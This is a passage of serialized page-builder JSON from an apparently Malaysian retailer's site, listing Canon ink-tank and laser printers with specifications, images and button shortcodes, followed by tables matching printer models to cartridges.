G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"&nbsp;\\n<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr>\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 